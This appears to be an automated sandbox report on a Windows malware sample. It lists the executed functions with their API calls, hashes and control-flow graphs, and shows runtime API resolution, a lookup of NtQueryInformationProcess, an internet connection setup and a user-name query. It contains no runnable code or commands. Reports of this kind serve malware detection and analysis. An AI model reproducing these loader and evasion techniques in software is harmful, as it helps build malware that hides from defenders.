404089 33154->33155 33156 404980 34 API calls 33155->33156 33157 40409f 33156->33157 33158 404980 34 API calls 33157->33158 33159 4040b8 33158->33159 33160 404980 34 API calls 33159->33160 33161 4040ce 33160->33161 33162 404980 34 API calls 33161->33162 33163 4040e4 33162->33163 33164 404980 34 API calls 33163->33164 33165 4040fa 33164->33165 33166 404980 34 API calls 33165->33166 33167 404110 33166->33167 33168 404980 34 API calls 33167->33168 33169 404126 33168->33169 33170 404980 34 API calls 33169->33170 33171 40413f 33170->33171 33172 404980 34 API calls 33171->33172 33173 404155 33172->33173 33174 404980 34 API calls 33173->33174 33175 40416b 33174->33175 33176 404980 34 API calls 33175->33176 33177 404181 33176->33177 33178 404980 34 API calls 33177->33178 33179 404197 33178->33179 33180 404980 34 API calls 33179->33180 33181 4041ad 33180->33181 33182 404980 34 API calls 33181->33182 33183 4041c6 33182->33183 33184 404980 34 API calls 33183->33184 33185 4041dc 33184->33185 33186 404980 34 API calls 33185->33186 33187 4041f2 33186->33187 33188 404980 34 API calls 33187->33188 33189 404208 33188->33189 33190 404980 34 API calls 33189->33190 33191 40421e 33190->33191 33192 404980 34 API calls 33191->33192 33193 404234 33192->33193 33194 404980 34 API calls 33193->33194 33195 40424d 33194->33195 33196 404980 34 API calls 33195->33196 33197 404263 33196->33197 33198 404980 34 API calls 33197->33198 33199 404279 33198->33199 33200 404980 34 API calls 33199->33200 33201 40428f 33200->33201 33202 404980 34 API calls 33201->33202 33203 4042a5 33202->33203 33204 404980 34 API calls 33203->33204 33205 4042bb 33204->33205 33206 404980 34 API calls 33205->33206 33207 4042d4 33206->33207 33208 404980 34 API calls 33207->33208 33209 4042ea 33208->33209 33210 404980 34 API calls 33209->33210 33211 404300 33210->33211 33212 404980 34 API calls 33211->33212 33213 404316 33212->33213 33214 404980 34 API calls 33213->33214 33215 40432c 33214->33215 33216 404980 34 API calls 33215->33216 33217 404342 33216->33217 33218 404980 34 API calls 33217->33218 33219 40435b 33218->33219 33220 404980 34 API calls 33219->33220 33221 404371 33220->33221 33222 404980 34 API calls 33221->33222 33223 404387 33222->33223 33224 404980 34 API calls 33223->33224 33225 40439d 33224->33225 33226 404980 34 API calls 33225->33226 33227 4043b3 33226->33227 33228 404980 34 API calls 33227->33228 33229 4043c9 33228->33229 33230 404980 34 API calls 33229->33230 33231 4043e2 33230->33231 33232 404980 34 API calls 33231->33232 33233 4043f8 33232->33233 33234 404980 34 API calls 33233->33234 33235 40440e 33234->33235 33236 404980 34 API calls 33235->33236 33237 404424 33236->33237 33238 404980 34 API calls 33237->33238 33239 40443a 33238->33239 33240 404980 34 API calls 33239->33240 33241 404450 33240->33241 33242 404980 34 API calls 33241->33242 33243 404469 33242->33243 33244 404980 34 API calls 33243->33244 33245 40447f 33244->33245 33246 404980 34 API calls 33245->33246 33247 404495 33246->33247 33248 404980 34 API calls 33247->33248 33249 4044ab 33248->33249 33250 404980 34 API calls 33249->33250 33251 4044c1 33250->33251 33252 404980 34 API calls 33251->33252 33253 4044d7 33252->33253 33254 404980 34 API calls 33253->33254 33255 4044f0 33254->33255 33256 404980 34 API calls 33255->33256 33257 404506 33256->33257 33258 404980 34 API calls 33257->33258 33259 40451c 33258->33259 33260 404980 34 API calls 33259->33260 33261 404532 33260->33261 33262 404980 34 API calls 33261->33262 33263 404548 33262->33263 33264 404980 34 API calls 33263->33264 33265 40455e 33264->33265 33266 404980 34 API calls 33265->33266 33267 404577 33266->33267 33268 404980 34 API calls 33267->33268 33269 40458d 33268->33269 33270 404980 34 API calls 33269->33270 33271 4045a3 33270->33271 33272 404980 34 API calls 33271->33272 33273 4045b9 33272->33273 33274 404980 34 API calls 33273->33274 33275 4045cf 33274->33275 33276 404980 34 API calls 33275->33276 33277 4045e5 33276->33277 33278 404980 34 API calls 33277->33278 33279 4045fe 33278->33279 33280 404980 34 API calls 33279->33280 33281 404614 33280->33281 33282 404980 34 API calls 33281->33282 33283 40462a 33282->33283 33284 404980 34 API calls 33283->33284 33285 404640 33284->33285 33286 404980 34 API calls 33285->33286 33287 404656 33286->33287 33288 404980 34 API calls 33287->33288 33289 40466c 33288->33289 33290 404980 34 API calls 33289->33290 33291 404685 33290->33291 33292 404980 34 API calls 33291->33292 33293 40469b 33292->33293 33294 404980 34 API calls 33293->33294 33295 4046b1 33294->33295 33296 404980 34 API calls 33295->33296 33297 4046c7 33296->33297 33298 404980 34 API calls 33297->33298 33299 4046dd 33298->33299 33300 404980 34 API calls 33299->33300 33301 4046f3 33300->33301 33302 404980 34 API calls 33301->33302 33303 40470c 33302->33303 33304 404980 34 API calls 33303->33304 33305 404722 33304->33305 33306 404980 34 API calls 33305->33306 33307 404738 33306->33307 33308 404980 34 API calls 33307->33308 33309 40474e 33308->33309 33310 404980 34 API calls 33309->33310 33311 404764 33310->33311 33312 404980 34 API calls 33311->33312 33313 40477a 33312->33313 33314 404980 34 API calls 33313->33314 33315 404793 33314->33315 33316 404980 34 API calls 33315->33316 33317 4047a9 33316->33317 33318 404980 34 API calls 33317->33318 33319 4047bf 33318->33319 33320 404980 34 API calls 33319->33320 33321 4047d5 33320->33321 33322 404980 34 API calls 33321->33322 33323 4047eb 33322->33323 33324 404980 34 API calls 33323->33324 33325 404801 33324->33325 33326 404980 34 API calls 33325->33326 33327 40481a 33326->33327 33328 404980 34 API calls 33327->33328 33329 404830 33328->33329 33330 404980 34 API calls 33329->33330 33331 404846 33330->33331 33332 404980 34 API calls 33331->33332 33333 40485c 33332->33333 33334 404980 34 API calls 33333->33334 33335 404872 33334->33335 33336 404980 34 API calls 33335->33336 33337 404888 33336->33337 33338 404980 34 API calls 33337->33338 33339 4048a1 33338->33339 33340 404980 34 API calls 33339->33340 33341 4048b7 33340->33341 33342 404980 34 API calls 33341->33342 33343 4048cd 33342->33343 33344 404980 34 API calls 33343->33344 33345 4048e3 33344->33345 33346 404980 34 API calls 33345->33346 33347 4048f9 33346->33347 33348 404980 34 API calls 33347->33348 33349 40490f 33348->33349 33350 404980 34 API calls 33349->33350 33351 404928 33350->33351 33352 404980 34 API calls 33351->33352 33353 40493e 33352->33353 33354 404980 34 API calls 33353->33354 33355 404954 33354->33355 33356 404980 34 API calls 33355->33356 33357 40496a 33356->33357 33359 404a9a 6 API calls 33358->33359 33360 404a1e 33358->33360 33359->32727 33361 404a26 11 API calls 33360->33361 33361->33359 33361->33361 34180 249cb99 strtok_s lstrcpy lstrcpy strtok_s 34129 249529d 290 API calls 34182 249c39d 11 API calls 34183 24a50bc 16 API calls 34263 249c99f 17 API calls 34131 24a1e9d ExitProcess 34264 405799 57 API calls 34132 24a0a91 1734 API calls 34265 4097a0 165 API calls 34266 24a99a8 167 API calls __setmbcp 34185 24a0bad 1723 API calls 34134 408ca9 ??2@YAPAXI strlen malloc strcpy_s RaiseException 34136 24a32a7 GetSystemPowerStatus 34229 24a84a7 RtlUnwind 34137 2491ea7 166 API calls 34187 249c3bf 15 API calls 34188 24907b0 120 API calls 34138 24a8ab0 42 API calls __calloc_crt 34139 24986b5 strtok_s strtok_s 34268 2498fba lstrcpy strtok_s

                                                    Executed Functions

                                                    Function 00404B80 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00404BAF
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C02
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C35
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C65
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404CA3
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404CD6
                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404CE6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$InternetOpen
                                                    • String ID: "$------
                                                    • API String ID: 2041821634-2370822465
                                                    • Opcode ID: 4097da9d3f46c4eb833c317d8ee2473c724f7206ea4219785e15119cd375c3aa
                                                    • Instruction ID: ee9b337c920fa440a166249251ede5a47d7364bfc35f9bc5310ef1df1bec01ed
                                                    • Opcode Fuzzy Hash: 4097da9d3f46c4eb833c317d8ee2473c724f7206ea4219785e15119cd375c3aa
                                                    • Instruction Fuzzy Hash: C5526E71A006169BDB10AFA5DC49B9F7BB5AF44304F14503AF904B72A1DB78ED42CBE8
                                                    Function 00404980 Relevance: 61.4, APIs: 34, Strings: 1, Instructions: 115stringmemoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404994
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040499B
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049A2
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049A9
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049B0
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 004049BB
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 004049C2
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049D2
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049D9
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049E0
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049E7
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049EE
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049F9
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A00
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A07
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A0E
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A15
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A2B
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A32
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A39
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A40
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A47
                                                    • strlen.MSVCRT ref: 00404A4F
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A73
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A7A
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A81
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A88
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A8F
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A9F
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AA6
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AAD
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AB4
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404ABB
                                                    • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00404AD0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                    • API String ID: 2127927946-3329630956
                                                    • Opcode ID: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
                                                    • Instruction ID: 31bf12c2d79e338fb7f97826348345d32b3aa4c96b478bc01bd0f7d9a8ca19b4
                                                    • Opcode Fuzzy Hash: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
                                                    • Instruction Fuzzy Hash: F531E920F4823C7F86206BA56C45BDFBED4DF8E750F389053F51855184C9A864058EE9
                                                    Function 004263C0 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1873 4263c0-4263ed GetPEB 1874 4265f3-426653 LoadLibraryA * 5 1873->1874 1875 4263f3-4265ee call 426320 GetProcAddress * 20 1873->1875 1877 426655-426663 GetProcAddress 1874->1877 1878 426668-42666f 1874->1878 1875->1874 1877->1878 1880 426671-426697 GetProcAddress * 2 1878->1880 1881 42669c-4266a3 1878->1881 1880->1881 1882 4266a5-4266b3 GetProcAddress 1881->1882 1883 4266b8-4266bf 1881->1883 1882->1883 1885 4266c1-4266cf GetProcAddress 1883->1885 1886 4266d4-4266db 1883->1886 1885->1886 1887 426707-42670a 1886->1887 1888 4266dd-426702 GetProcAddress * 2 1886->1888 1888->1887
                                                    APIs
                                                    • GetProcAddress.KERNEL32(75550000,00929C68), ref: 00426419
                                                    • GetProcAddress.KERNEL32(75550000,00929CC8), ref: 00426432
                                                    • GetProcAddress.KERNEL32(75550000,00929C50), ref: 0042644A
                                                    • GetProcAddress.KERNEL32(75550000,00929CB0), ref: 00426462
                                                    • GetProcAddress.KERNEL32(75550000,009254D0), ref: 0042647B
                                                    • GetProcAddress.KERNEL32(75550000,00923348), ref: 00426493
                                                    • GetProcAddress.KERNEL32(75550000,00923328), ref: 004264AB
                                                    • GetProcAddress.KERNEL32(75550000,00929CE0), ref: 004264C4
                                                    • GetProcAddress.KERNEL32(75550000,00929CF8), ref: 004264DC
                                                    • GetProcAddress.KERNEL32(75550000,00948008), ref: 004264F4
                                                    • GetProcAddress.KERNEL32(75550000,00947F60), ref: 0042650D
                                                    • GetProcAddress.KERNEL32(75550000,009231C8), ref: 00426525
                                                    • GetProcAddress.KERNEL32(75550000,00947F18), ref: 0042653D
                                                    • GetProcAddress.KERNEL32(75550000,009480C8), ref: 00426556
                                                    • GetProcAddress.KERNEL32(75550000,00923188), ref: 0042656E
                                                    • GetProcAddress.KERNEL32(75550000,009480B0), ref: 00426586
                                                    • GetProcAddress.KERNEL32(75550000,00947E88), ref: 0042659F
                                                    • GetProcAddress.KERNEL32(75550000,00923408), ref: 004265B7
                                                    • GetProcAddress.KERNEL32(75550000,00947FD8), ref: 004265CF
                                                    • GetProcAddress.KERNEL32(75550000,00923368), ref: 004265E8
                                                    • LoadLibraryA.KERNEL32(00947E28,?,?,?,00421BE3), ref: 004265F9
                                                    • LoadLibraryA.KERNEL32(00948050,?,?,?,00421BE3), ref: 0042660B
                                                    • LoadLibraryA.KERNEL32(00947F90,?,?,?,00421BE3), ref: 0042661D
                                                    • LoadLibraryA.KERNEL32(00948038,?,?,?,00421BE3), ref: 0042662E
                                                    • LoadLibraryA.KERNEL32(00948068,?,?,?,00421BE3), ref: 00426640
                                                    • GetProcAddress.KERNEL32(75670000,00947FC0), ref: 0042665D
                                                    • GetProcAddress.KERNEL32(75750000,00947FA8), ref: 00426679
                                                    • GetProcAddress.KERNEL32(75750000,00947F30), ref: 00426691
                                                    • GetProcAddress.KERNEL32(76BE0000,00948020), ref: 004266AD
                                                    • GetProcAddress.KERNEL32(759D0000,00923388), ref: 004266C9
                                                    • GetProcAddress.KERNEL32(773F0000,00925520), ref: 004266E5
                                                    • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 004266FC
                                                    Strings
                                                    • NtQueryInformationProcess, xrefs: 004266F1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID: NtQueryInformationProcess
                                                    • API String ID: 2238633743-2781105232
                                                    • Opcode ID: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
                                                    • Instruction ID: 7b5cedaa0e73423a59cdd3f572970276683dffd84f65f372ce21167b4aa31ce5
                                                    • Opcode Fuzzy Hash: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
                                                    • Instruction Fuzzy Hash: E0A16DB9A117009FD758DF65EE88A6637BBF789344300A51EF94683364DBB4A900DFB0
                                                    Function 004229E0 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00422A0F
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00422A16
                                                    • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00422A2A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocNameProcessUser
                                                    • String ID:
                                                    • API String ID: 1206570057-0
                                                    • Opcode ID: 8d99d318415601690ae838a51b87a7364d012be2201e373feb9efb6fa8a950a4
                                                    • Instruction ID: aa6ded6259508bede27090f4c861d2ca31da26e1ef70df7e495680ac72f078f7
                                                    • Opcode Fuzzy Hash: 8d99d318415601690ae838a51b87a7364d012be2201e373feb9efb6fa8a950a4
                                                    • Instruction Fuzzy Hash: 95F054B1A44614AFD710DF98DD49B9ABBBCF744B65F10021AF915E3680D7B419048BE1
                                                    Function 00426710 Relevance: 214.2, APIs: 115, Strings: 7, Instructions: 696libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 633 426710-426717 634 426b2e-426bc2 LoadLibraryA * 8 633->634 635 42671d-426b29 GetProcAddress * 43 633->635 636 426bc4-426c33 GetProcAddress * 5 634->636 637 426c38-426c3f 634->637 635->634 636->637 638 426d02-426d09 637->638 639 426c45-426cfd GetProcAddress * 8 637->639 640 426d0b-426d7a GetProcAddress * 5 638->640 641 426d7f-426d86 638->641 639->638 640->641 642 426e19-426e20 641->642 643 426d8c-426e14 GetProcAddress * 6 641->643 644 426f40-426f47 642->644 645 426e26-426f3b GetProcAddress * 12 642->645 643->642 646 426f49-426fb8 GetProcAddress * 5 644->646 647 426fbd-426fc4 644->647 645->644 646->647 648 426ff1-426ff8 647->648 649 426fc6-426fec GetProcAddress * 2 647->649 650 427025-42702c 648->650 651 426ffa-427020 GetProcAddress * 2 648->651 649->648 652 427032-427118 GetProcAddress * 10 650->652 653 42711d-427124 650->653 651->650 652->653 654 427182-427189 653->654 655 427126-42717d GetProcAddress * 4 653->655 656 42718b-427199 GetProcAddress 654->656 657 42719e-4271a5 654->657 655->654 656->657 658 427203 657->658 659 4271a7-4271fe GetProcAddress * 4 657->659 659->658
                                                    APIs
                                                    • GetProcAddress.KERNEL32(75550000,009232C8), ref: 00426725
                                                    • GetProcAddress.KERNEL32(75550000,00923448), ref: 0042673D
                                                    • GetProcAddress.KERNEL32(75550000,00947F78), ref: 00426756
                                                    • GetProcAddress.KERNEL32(75550000,009481A0), ref: 0042676E
                                                    • GetProcAddress.KERNEL32(75550000,00948170), ref: 00426786
                                                    • GetProcAddress.KERNEL32(75550000,009481D0), ref: 0042679F
                                                    • GetProcAddress.KERNEL32(75550000,0094AD18), ref: 004267B7
                                                    • GetProcAddress.KERNEL32(75550000,00948110), ref: 004267CF
                                                    • GetProcAddress.KERNEL32(75550000,00948128), ref: 004267E8
                                                    • GetProcAddress.KERNEL32(75550000,00948140), ref: 00426800
                                                    • GetProcAddress.KERNEL32(75550000,00948158), ref: 00426818
                                                    • GetProcAddress.KERNEL32(75550000,00923468), ref: 00426831
                                                    • GetProcAddress.KERNEL32(75550000,009234C8), ref: 00426849
